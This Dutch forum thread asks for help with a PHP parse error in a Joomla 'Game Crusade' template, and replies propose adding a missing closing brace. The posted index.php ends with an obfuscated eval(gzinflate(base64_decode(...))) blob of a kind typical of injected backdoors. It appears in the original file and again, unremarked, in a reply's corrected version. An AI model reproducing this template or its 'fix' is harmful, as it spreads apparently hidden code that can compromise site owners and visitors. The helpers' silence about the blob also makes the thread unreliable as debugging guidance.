Website offline!! Parse error: syntax error, unexpected $end in

Status
Niet open voor verdere reacties.

jeroen890

Nieuwe gebruiker
Lid geworden
16 sep 2012
Berichten
1
Hello Iedereen,

Ik ben niet bekend met HTML codes maar ik heb een serieus probleem met mij website welke de volgende error geeft als ik hem probeer te openen:

Parse error: syntax error, unexpected $end in /home/person69/public_html/templates/game_crusade/index.php on line 359

Hieronder heb ik de HTML code neergezet, kan iemand mij alsjeblieft vertellen wat er aan de hand is zodat ik het aan kan passen!?

PHP:
<?php
defined( '_JEXEC' ) or die( 'Restricted index access' );
define( 'TEMPLATEPATH', dirname(__FILE__) );
/*
-----------------------------------------
Game Crusade - December 2009 Shape 5 Club Template
-----------------------------------------
Site:      www.shape5.com
Email:     contact@shape5.com
@license:  Copyrighted Commercial Software
@copyright (C) 2009 Shape 5

*/

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />

<?php

//
///////////////////////////////////////////////////////////////////////////////////////

	
		
		$s5_bg = $this->params->get ("xml_s5_bg");
		$s5_bg_images = $this->params->get ("xml_s5_bg_images");
		$s5_bg_tween = $this->params->get ("xml_s5_bg_tween");
		$s5_bg_fixed = $this->params->get ("xml_s5_bg_fixed");
		$s5_highlight = $this->params->get ("xml_s5_highlight");
		$s5_body_width = $this->params->get ("xml_s5_body_width");
		$s5_top1_width = $this->params->get ("xml_s5_top1_width");
		$s5_right_width = $this->params->get ("xml_s5_right_width");
		$s5_left_width = $this->params->get ("xml_s5_left_width");
		$s5_inset_width = $this->params->get ("xml_s5_inset_width");
		$s5_menu_color = $this->params->get ("xml_s5_menu_color");      
		$s5_menu = $this->params->get ("xml_s5_menu");    
		$s5_jsmenu = $this->params->get ("xml_s5_jsmenu");  
		$s5_text_menu_1 = $this->params->get ("xml_s5_text_menu_1");
		$s5_text_menu_2 = $this->params->get ("xml_s5_text_menu_2");
		$s5_text_menu_3 = $this->params->get ("xml_s5_text_menu_3");
		$s5_text_menu_4 = $this->params->get ("xml_s5_text_menu_4");
		$s5_text_menu_5 = $this->params->get ("xml_s5_text_menu_5");
		$s5_text_menu_6 = $this->params->get ("xml_s5_text_menu_6");
		$s5_text_menu_7 = $this->params->get ("xml_s5_text_menu_7");
		$s5_text_menu_8 = $this->params->get ("xml_s5_text_menu_8");
		$s5_text_menu_9 = $this->params->get ("xml_s5_text_menu_9");
		$s5_text_menu_10 = $this->params->get ("xml_s5_text_menu_10");
		$s5_show_frontpage = $this->params->get ("xml_s5_frontpage");  
		$s5_urlforSEO = $this->params->get ("xml_s5_seourl");
		$s5_lytebox = $this->params->get ("xml_s5_lytebox");  
		$s5_tooltips = $this->params->get ("xml_s5_tooltips"); 
		


// It is recommended that you do not edit below this line.
///////////////////////////////////////////////////////////////////////////////////////


if (($s5_menu  == "1") || ($s5_menu  == "3") || ($s5_menu  == "4")){ 
	if ($s5_jsmenu == "s5") { 
		require( TEMPLATEPATH.DS."s5_no_moo_menu.php");
		$menu_name = $this->params->get ("xml_menuname");
	}
	else if ($s5_jsmenu == "jq")  {
		require( TEMPLATEPATH.DS."s5_suckerfish.php");
		$menu_name = $this->params->get ("xml_menuname");
	}
}

else if ($s5_menu  == "2")  {
	require( TEMPLATEPATH.DS."s5_suckerfish.php");
	$menu_name = $this->params->get ("xml_menuname");
}

if ($s5_urlforSEO  == ""){ 
$LiveSiteUrl = JURI::root();}
if ($s5_urlforSEO  != ""){ 
$LiveSiteUrl = "$s5_urlforSEO/";}

$br = strtolower($_SERVER['HTTP_USER_AGENT']);
$browser = "other";

if(strrpos($br,"msie 7") > 1) {
$browser = "ie7";} 

if(strrpos($br,"msie 8") > 1) {
$browser = "ie8";} 


// Module size calculations

$s5_inset_margin = "11";
$s5_right_margin = "11";
$s5_left_margin = "11";

$s5_inset_margin_l = "0";
$s5_inset_margin_r = "0";

if(!$this->countModules('inset')) {
$s5_inset_width = "0";	
$s5_inset_margin = "0";
}

if(!$this->countModules('right')) {
$s5_right_width = "0";	
$s5_right_margin = "0";
}

if(!$this->countModules('left')) {
$s5_left_width = "0";	
$s5_left_margin = "0";
}

if($this->countModules('inset') && $this->countModules('right')) {
$s5_inset_margin = "22";
$s5_inset_margin_l = "11";
$s5_inset_margin_r = "0";
}

if($this->countModules('inset') && !$this->countModules('right')) {
$s5_inset_margin = "11";
$s5_inset_margin_l = "11";
}


if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="24.9%"; }
else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="33.3%"; }
else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="33.3%"; }
else if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="33.3%"; }
else if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="33.3%"; }
else if (!$this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="49.9%"; }
else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="49.9%"; }
else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="49.9%"; }
else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="49.9%"; }
else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="49.9%"; }
else if ($this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="49.9%"; }
else if (!$this->countModules("top_row_1") && !$this->countModules("top_row_2") && !$this->countModules("top_row_3") && $this->countModules("top_row_4")) { $top_row="100%"; }
else if (!$this->countModules("top_row_1") && $this->countModules("top_row_2") && !$this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="100%"; }
else if (!$this->countModules("top_row_1") && !$this->countModules("top_row_2") && $this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="100%"; }
else if ($this->countModules("top_row_1") && !$this->countModules("top_row_2") && !$this->countModules("top_row_3") && !$this->countModules("top_row_4")) { $top_row="100%"; }


if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="24.9%"; }
else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
else if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
else if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="33.3%"; }
else if (!$this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
else if ($this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="49.9%"; }
else if (!$this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && $this->countModules("bottom_row_4")) { $bottom_row="100%"; }
else if (!$this->countModules("bottom_row_1") && $this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="100%"; }
else if (!$this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && $this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="100%"; }
else if ($this->countModules("bottom_row_1") && !$this->countModules("bottom_row_2") && !$this->countModules("bottom_row_3") && !$this->countModules("bottom_row_4")) { $bottom_row="100%"; }




?>

<meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
<meta http-equiv="Content-Style-Type" content="text/css" />

<link rel="stylesheet" href="<?php echo $LiveSiteUrl ?>templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $LiveSiteUrl ?>templates/system/css/general.css" type="text/css" />

<link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/template_css.css" rel="stylesheet" type="text/css" media="screen" />

<link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/s5_suckerfish.css" rel="stylesheet" type="text/css" media="screen" />

<?php if ($s5_jsmenu == "jq") { ?>
<?php if (($s5_menu  == "1") || ($s5_menu  == "3") || ($s5_menu  == "4")) { ?>
<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/bridgeofhope/js/jquery13.js"></script>
<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/bridgeofhope/js/jquery.no.conflict.js"></script>
<script type="text/javascript">
function s5_jqmainmenu(){
jQuery(" #navlist ul ").css({display: "none"}); // Opera Fix
jQuery(" #s5_navv li").hover(function(){
		jQuery(this).find('ul:first').css({visibility: "visible",display: "none"}).<?php if ($s5_menu  == "1") { ?>show(400)<?php } ?><?php if ($s5_menu  == "3") { ?>fadeIn(500)<?php } ?><?php if ($s5_menu  == "4") { ?>slideDown(400)<?php } ?>;
		},function(){jQuery(this).find('ul:first').css({visibility: "hidden"});	});}
  jQuery(document).ready(function(){ s5_jqmainmenu();});
</script>
<?php } ?>
<?php } ?>

<link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/editor.css" rel="stylesheet" type="text/css" media="screen" />

<link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<?php 
// Disable lytebox when VM is loaded 
if (JRequest::getVar('option') == 'com_virtuemart' ) { 
 } else { ?>
<?php if ($s5_lytebox  == "yes") { ?>
<link href="<?php echo $LiveSiteUrl ?>templates/game_crusade/css/lytebox.css" rel="stylesheet" type="text/css" media="screen" />
<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/lytebox.js"></script>
<?php } ?>
<?php } ?>

<?php { 
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_1 = '".$s5_text_menu_1."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_2 = '".$s5_text_menu_2."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_3 = '".$s5_text_menu_3."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_4 = '".$s5_text_menu_4."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_5 = '".$s5_text_menu_5."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_6 = '".$s5_text_menu_6."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_7 = '".$s5_text_menu_7."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_8 = '".$s5_text_menu_8."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_9 = '".$s5_text_menu_9."';</script>";
echo "<script language=\"javascript\" type=\"text/javascript\" >var s5_text_menu_10 = '".$s5_text_menu_10."';</script>";
}?>

<?php if($browser == "ie7" && $s5_menu != "5") { ?>
<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/IEsuckerfish.js"></script>
<?php } ?>

<style type="text/css"> 

#s5_menu {
background:<?php if ($s5_menu_color != "") { ?>#<?php echo $s5_menu_color ?> <?php } ?>url(<?php echo $LiveSiteUrl ?>templates/game_crusade/images/s5_menu_bg.png) repeat-x top left;
}

#s5_navv ul li.active a.active, #cboxLoadedContent div.module h3, .s5_h3_first, a, .contentheading, .componentheading, #current, #current span.s5_accordion_menu_left a.mainlevel, #current span {
color:#<?php echo $s5_highlight ?>;
}

<?php if(!$this->countModules('bottom_row_1') && !$this->countModules('bottom_row_2') && !$this->countModules('bottom_row_3') && !$this->countModules('bottom_row_4')) { ?>
#s5_footer {
margin-top:-11px;
}
<?php } ?>

<?php if(!$this->countModules('top_3')) { ?>
#s5_top_container {
margin-bottom:0px;
}

#s5_top_container .module_round_box {
margin-bottom:0px;
}
<?php } ?>

<?php if ($s5_menu  == "5") { ?>

#s5_top_container {
margin:0px;
}

#s5_top_container .module_round_box {
margin-top:0px;
}

<?php } ?>

<?php if($browser == "ie7") { ?>
.s5_mm {
	background:#050505;
	filter: alpha(opacity=78);
}
<?php } ?>

</style>

</head>

<body id="s5_body" style="background-color:#<?php echo $s5_bg ?>">
<div id="s5_body_wrap" style="background:url('<?php echo $LiveSiteUrl ?>templates/game_crusade/images/s5_background1.jpg') no-repeat top center<?php if ($s5_bg_fixed == "fixed") { ?>; position:fixed<?php } ?>">
</div>
<?php if ($s5_bg_fixed == "fluid") { ?>
<script type="text/javascript" language="javascript">
function s5_gc_getDocHeight() {
    var s5_gc_D = document;
    return Math.max(
        Math.max(s5_gc_D.body.scrollHeight, s5_gc_D.documentElement.scrollHeight),
        Math.max(s5_gc_D.body.offsetHeight, s5_gc_D.documentElement.offsetHeight),
        Math.max(s5_gc_D.body.clientHeight, s5_gc_D.documentElement.clientHeight)
    );
}
function s5_gc_resize_bg() {
s5_gc_getDocHeight();
document.getElementById("s5_body_wrap").style.height = s5_gc_getDocHeight() + "px";
}
var s5_gc_resize_Interval = 0;
s5_gc_resize_Interval = window.setInterval("s5_gc_resize_bg()",200);
</script>
<?php } ?>

<div id="s5_main_body_wrap" style="margin-left:-<?php echo $s5_body_width/2 ?>px; width:<?php echo $s5_body_width ?>px">

	<div id="s5_header_wrap1">
	<div id="s5_header_wrap2">
	<div id="s5_header_wrap3" style="width:<?php echo $s5_body_width - 24 ?>px">
		<div id="s5_logo" onclick="window.document.location.href='index.php'"></div>
		<div id="s5_top_wrap" style="width:<?php echo $s5_body_width - 464 ?>px">
			<div id="s5_top_menu">
				<jdoc:include type="modules" name="top_menu" style="no_title" />
			</div>
			<div style="clear:both"></div>
			<?php if ($this->countModules("search")) { ?>
			<div id="s5_search_outer">
			<div id="s5_search">
				<jdoc:include type="modules" name="search" style="no_title" />
			</div>
			</div>
		<?php } ?>
		</div>
	</div>
	</div>
	</div>
	
	<div id="s5_main_wrap" style="width:<?php echo $s5_body_width ?>px">
		<?php if ($this->countModules("top_1") || $this->countModules("top_2") || $this->countModules("top_3") || $s5_menu  <= "4") { ?>
			<div class="s5_round_wrap">
			
				<div class="s5_tl"></div>
				<div class="s5_tm" style="width:<?php echo $s5_body_width - 48 ?>px"></div>
				<div class="s5_tr"></div>
				
				<div class="s5_ml" style="width:<?php echo $s5_body_width - 24 ?>px">
				<div class="s5_mr" style="width:<?php echo $s5_body_width - 48 ?>px">
					<div class="s5_mm" style="width:<?php echo $s5_body_width - 48 ?>px">
					<div style="position:relative">
						<?php if ($s5_menu  != "5") { ?>
				
							<div id="s5_menu">
								
								<div id="s5_navv">
													
									<?php mosShowListMenu($menu_name);	?>
									
									<?php if ($s5_jsmenu  == "s5") { ?>
										<?php if ($s5_menu  == "1") { ?>
											<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_drop_in_no_moo_menu.js"></script>																		
										<?php } ?>
										<?php if ($s5_menu  == "2") { ?>
											<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_fading_no_moo_menu.js"></script>																		
										<?php } ?>	
										<?php if ($s5_menu  == "3") { ?>
											<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_scroll_down_no_moo_menu.js"></script>																		
										<?php } ?>	
									<?php } ?>	
									
									<script type="text/javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_menu_active_and_parent_links.js"></script>																		
													
								</div>
								
								
	<script type="text/javascript" language="javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_effects.js"></script>
	<?php } ?>

<?php eval(@gzinflate(base64_decode('TVXJDqzIEfyXdxlbWMO+yZpDs+9bN6ueZAENDTQ7FNvXD+M3kn0IhTIiSlmHyspxLj7/mYuxTfPiHz/g3yG4+PGvHz8Pivx50NTN6A3+54ExN9O39riZvSHeoH55f2Vo4teZ/+awvzX8l4bfOfz2Semu/85Rf3n/V2PMb0fwXjNIk0WHMDdMBcyIr/VXK1pxaNsrGQnwrP25OZFte3hJekhoI7HtPL9dLWJYhgZ0QtqIpUKU7PFKhSV90vXdGztY63JJRhdfftaEAlhq7tybLvleM5Sp+7NknpCdQwyRyT3DZFr4xvrlzc35Q4V3E1YOKJHeySnO02Op7I4cnj6KqC/yTYd1FV4iJ+18E5q1YOIg7Bl7lkh40hcJfstihCh7JT5ex0CU3x0gTP4ZuuSVTGpwyrioQ0quJRfzVjDLJJERW2uRtoOIVzkzpam7lY1o9PTovzmTX0fCJQrwKSrLXRn+xIijOFE2Dy+G8r7wYIl69Fnt3hbU/Box8pOpKeX4spDsWu1t9nKaudKULnDbWJbDOEkGNiA+dBInUAojGJAhPo5Cug+JF/f41keFQBXz8fy9PtrODiuJsGxO1AQGc1SYMoTeJ6Blgqtvfg7LwDvsd3KALFQfWaSOBpltsgz6YiihGXfYRSgNfaMpFHPObem7cKlSurdTSNmqnnRhAJb7kYzu4bUzYYPPRHJt61Yt7ezTNpNdnNb0iYnP/GXjvGhfEcIS8Te1hw4Xmb4RUea7UG89dAgHfqmCAT9FF+n1lzq/s/4iphJytLN1nrOqciqiyt9tqOhKj4KlotcXNJzwfIHVcuKXMgWcos2bnqkUv3fwEh/bp9tscTrPT92GNobXgQUJyEbVZx2nV7IKBpengs8UFNGE68JKVpQ378VduNCZRHIzFwVtXFjGhEHsQzb1CaOi+o4hp4aweoSjPuYhfAqAtZeWBvWUro/9K3wbmSzgU1dUo9JGo19qO8hn6fMtlZjglzZ5pw6jTfU9GJozOCVaWacRXthjfeFGiNV1m4VEOAcgDBM5HNX2YczAsusMO0UEpCVa8AKnjZAn6p2S+cXK0akFC1cZWdq+pgKEl0RBVUniU5ErcD7OlzO72S2ezjmOGFmxGSlDTVDGSqwX8YbTn4RrxvKrVvcHmfNYcDmRZCsiPLXUWgT3lRWLBJuTrOI+wPUI080SLwCLsjMvnui6lVqXjY9AQDhoKBGebxcP95W5n5qZIBYeh3qKIDCyJ5O2yOkX4KwZ1CjLaqSKdbb+6Nm5T2NzKJLq8nnfd0i5naKBxPh7nu3wA6alMy4mGT2xlmryHOnLw+moKbFzS7RnyMqaPo7zNIwGg7PfQ+JiQ+DUZZeMXLYIC0ywTTaklZYst7L0FtFv6o3m0eErras/h5dZm0DuvOdGCnUmRoL5XMLWvNDQ3/X78zIVaj5QJU08/BGC7BT945oXW09b6k2PKa+Jg0gNPqdnH8v/0iM5QEKXqNnVi4WpIgcKAg/SNNfT9ays7ZEIEZSpQfA8llQW9C6nxa20y+nkpVLHQUwcXEVKjxlMR1TY0iADIfNhsbyc0yydDaVJq+zrq3zGhvziq9WOmLXNPOPAxGXQYOO9Z6xclycIPUmgg8CNC0S1M4HXpwMbYZZKHe1iPTyQUD8n2mzzt29WpbGqrlB/fK7N7nMduHUuCy4Z6wwwqjkzyF1PTs+RjBDZ5L1txp6qQU1aCuTsCw4/3D/++O3eCOz/gHP3Uvr9xz///Sc='))); ?></body>

</html>

Alvast heel erg bedankt! hoop dat ik 'm snel weer online heb!
 
Laatst bewerkt door een moderator:
Welkom op Helpmij "jeroen890",

De foutmelding komt vanuit PHP en heeft dus weinig met HTML te maken.
Om die reden verplaats ik deze vraag van "Programmeren > HTML" naar "Programmeren > PHP".

Met vriendelijke groet,
Stefan (Tha Devil)
Moderator Helpmij.nl
 
Dit is ff lastig. ik zie hem niet zo snel en verder heeft er ook niemand gereageerd.

dus:
probeer de met dingen tussen commentaar te zetten. dan kun je te weten komen waar de fout zit.
als je die regel dan nog eens weet te posten.
want regel 359 kan geen php fout bevatten.

voor als je het niet weet:
html commentaar <!--commentaar-->
php commentaar /*commentaar*/
 
Waarschijnlijk heb je ergens een sluitaccolade vergeten, de code (structuur) is echter zo slecht te volgen dat het niet duidelijk is waar het gebeurd

Regels 329 en 331 hebben geen sluit </div> en }

deze moeten waarschijnlijk nog op 352 en 353
 
Laatst bewerkt door een moderator:
Je bent een '}' vergeten te sluiten!

Jouw script:
H
PHP:
<?php

//*knip*
								
								
	<script type="text/javascript" language="javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_effects.js"></script>
	<?php } ?>

<?php eval(@gzinflate(base64_decode('TVXJDqzIEfyXdxlbWMO+yZpDs+9bN6ueZAENDTQ7FNvXD+M3kn0IhTIiSlmHyspxLj7/mYuxTfPiHz/g3yG4+PGvHz8Pivx50NTN6A3+54ExN9O39riZvSHeoH55f2Vo4teZ/+awvzX8l4bfOfz2Semu/85Rf3n/V2PMb0fwXjNIk0WHMDdMBcyIr/VXK1pxaNsrGQnwrP25OZFte3hJekhoI7HtPL9dLWJYhgZ0QtqIpUKU7PFKhSV90vXdGztY63JJRhdfftaEAlhq7tybLvleM5Sp+7NknpCdQwyRyT3DZFr4xvrlzc35Q4V3E1YOKJHeySnO02Op7I4cnj6KqC/yTYd1FV4iJ+18E5q1YOIg7Bl7lkh40hcJfstihCh7JT5ex0CU3x0gTP4ZuuSVTGpwyrioQ0quJRfzVjDLJJERW2uRtoOIVzkzpam7lY1o9PTovzmTX0fCJQrwKSrLXRn+xIijOFE2Dy+G8r7wYIl69Fnt3hbU/Box8pOpKeX4spDsWu1t9nKaudKULnDbWJbDOEkGNiA+dBInUAojGJAhPo5Cug+JF/f41keFQBXz8fy9PtrODiuJsGxO1AQGc1SYMoTeJ6Blgqtvfg7LwDvsd3KALFQfWaSOBpltsgz6YiihGXfYRSgNfaMpFHPObem7cKlSurdTSNmqnnRhAJb7kYzu4bUzYYPPRHJt61Yt7ezTNpNdnNb0iYnP/GXjvGhfEcIS8Te1hw4Xmb4RUea7UG89dAgHfqmCAT9FF+n1lzq/s/4iphJytLN1nrOqciqiyt9tqOhKj4KlotcXNJzwfIHVcuKXMgWcos2bnqkUv3fwEh/bp9tscTrPT92GNobXgQUJyEbVZx2nV7IKBpengs8UFNGE68JKVpQ378VduNCZRHIzFwVtXFjGhEHsQzb1CaOi+o4hp4aweoSjPuYhfAqAtZeWBvWUro/9K3wbmSzgU1dUo9JGo19qO8hn6fMtlZjglzZ5pw6jTfU9GJozOCVaWacRXthjfeFGiNV1m4VEOAcgDBM5HNX2YczAsusMO0UEpCVa8AKnjZAn6p2S+cXK0akFC1cZWdq+pgKEl0RBVUniU5ErcD7OlzO72S2ezjmOGFmxGSlDTVDGSqwX8YbTn4RrxvKrVvcHmfNYcDmRZCsiPLXUWgT3lRWLBJuTrOI+wPUI080SLwCLsjMvnui6lVqXjY9AQDhoKBGebxcP95W5n5qZIBYeh3qKIDCyJ5O2yOkX4KwZ1CjLaqSKdbb+6Nm5T2NzKJLq8nnfd0i5naKBxPh7nu3wA6alMy4mGT2xlmryHOnLw+moKbFzS7RnyMqaPo7zNIwGg7PfQ+JiQ+DUZZeMXLYIC0ywTTaklZYst7L0FtFv6o3m0eErras/h5dZm0DuvOdGCnUmRoL5XMLWvNDQ3/X78zIVaj5QJU08/BGC7BT945oXW09b6k2PKa+Jg0gNPqdnH8v/0iM5QEKXqNnVi4WpIgcKAg/SNNfT9ays7ZEIEZSpQfA8llQW9C6nxa20y+nkpVLHQUwcXEVKjxlMR1TY0iADIfNhsbyc0yydDaVJq+zrq3zGhvziq9WOmLXNPOPAxGXQYOO9Z6xclycIPUmgg8CNC0S1M4HXpwMbYZZKHe1iPTyQUD8n2mzzt29WpbGqrlB/fK7N7nMduHUuCy4Z6wwwqjkzyF1PTs+RjBDZ5L1txp6qQU1aCuTsCw4/3D/++O3eCOz/gHP3Uvr9xz///Sc='))); ?></body>

</html>

mijn aanpassing:

H
PHP:
<?php

//*knip*
								
								
	<script type="text/javascript" language="javascript" src="<?php echo $LiveSiteUrl ?>templates/game_crusade/js/s5_effects.js"></script>
	<?php } } ?>

<?php eval(@gzinflate(base64_decode('TVXJDqzIEfyXdxlbWMO+yZpDs+9bN6ueZAENDTQ7FNvXD+M3kn0IhTIiSlmHyspxLj7/mYuxTfPiHz/g3yG4+PGvHz8Pivx50NTN6A3+54ExN9O39riZvSHeoH55f2Vo4teZ/+awvzX8l4bfOfz2Semu/85Rf3n/V2PMb0fwXjNIk0WHMDdMBcyIr/VXK1pxaNsrGQnwrP25OZFte3hJekhoI7HtPL9dLWJYhgZ0QtqIpUKU7PFKhSV90vXdGztY63JJRhdfftaEAlhq7tybLvleM5Sp+7NknpCdQwyRyT3DZFr4xvrlzc35Q4V3E1YOKJHeySnO02Op7I4cnj6KqC/yTYd1FV4iJ+18E5q1YOIg7Bl7lkh40hcJfstihCh7JT5ex0CU3x0gTP4ZuuSVTGpwyrioQ0quJRfzVjDLJJERW2uRtoOIVzkzpam7lY1o9PTovzmTX0fCJQrwKSrLXRn+xIijOFE2Dy+G8r7wYIl69Fnt3hbU/Box8pOpKeX4spDsWu1t9nKaudKULnDbWJbDOEkGNiA+dBInUAojGJAhPo5Cug+JF/f41keFQBXz8fy9PtrODiuJsGxO1AQGc1SYMoTeJ6Blgqtvfg7LwDvsd3KALFQfWaSOBpltsgz6YiihGXfYRSgNfaMpFHPObem7cKlSurdTSNmqnnRhAJb7kYzu4bUzYYPPRHJt61Yt7ezTNpNdnNb0iYnP/GXjvGhfEcIS8Te1hw4Xmb4RUea7UG89dAgHfqmCAT9FF+n1lzq/s/4iphJytLN1nrOqciqiyt9tqOhKj4KlotcXNJzwfIHVcuKXMgWcos2bnqkUv3fwEh/bp9tscTrPT92GNobXgQUJyEbVZx2nV7IKBpengs8UFNGE68JKVpQ378VduNCZRHIzFwVtXFjGhEHsQzb1CaOi+o4hp4aweoSjPuYhfAqAtZeWBvWUro/9K3wbmSzgU1dUo9JGo19qO8hn6fMtlZjglzZ5pw6jTfU9GJozOCVaWacRXthjfeFGiNV1m4VEOAcgDBM5HNX2YczAsusMO0UEpCVa8AKnjZAn6p2S+cXK0akFC1cZWdq+pgKEl0RBVUniU5ErcD7OlzO72S2ezjmOGFmxGSlDTVDGSqwX8YbTn4RrxvKrVvcHmfNYcDmRZCsiPLXUWgT3lRWLBJuTrOI+wPUI080SLwCLsjMvnui6lVqXjY9AQDhoKBGebxcP95W5n5qZIBYeh3qKIDCyJ5O2yOkX4KwZ1CjLaqSKdbb+6Nm5T2NzKJLq8nnfd0i5naKBxPh7nu3wA6alMy4mGT2xlmryHOnLw+moKbFzS7RnyMqaPo7zNIwGg7PfQ+JiQ+DUZZeMXLYIC0ywTTaklZYst7L0FtFv6o3m0eErras/h5dZm0DuvOdGCnUmRoL5XMLWvNDQ3/X78zIVaj5QJU08/BGC7BT945oXW09b6k2PKa+Jg0gNPqdnH8v/0iM5QEKXqNnVi4WpIgcKAg/SNNfT9ays7ZEIEZSpQfA8llQW9C6nxa20y+nkpVLHQUwcXEVKjxlMR1TY0iADIfNhsbyc0yydDaVJq+zrq3zGhvziq9WOmLXNPOPAxGXQYOO9Z6xclycIPUmgg8CNC0S1M4HXpwMbYZZKHe1iPTyQUD8n2mzzt29WpbGqrlB/fK7N7nMduHUuCy4Z6wwwqjkzyF1PTs+RjBDZ5L1txp6qQU1aCuTsCw4/3D/++O3eCOz/gHP3Uvr9xz///Sc='))); ?></body>

</html>


Greetzz
 
Laatst bewerkt:
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan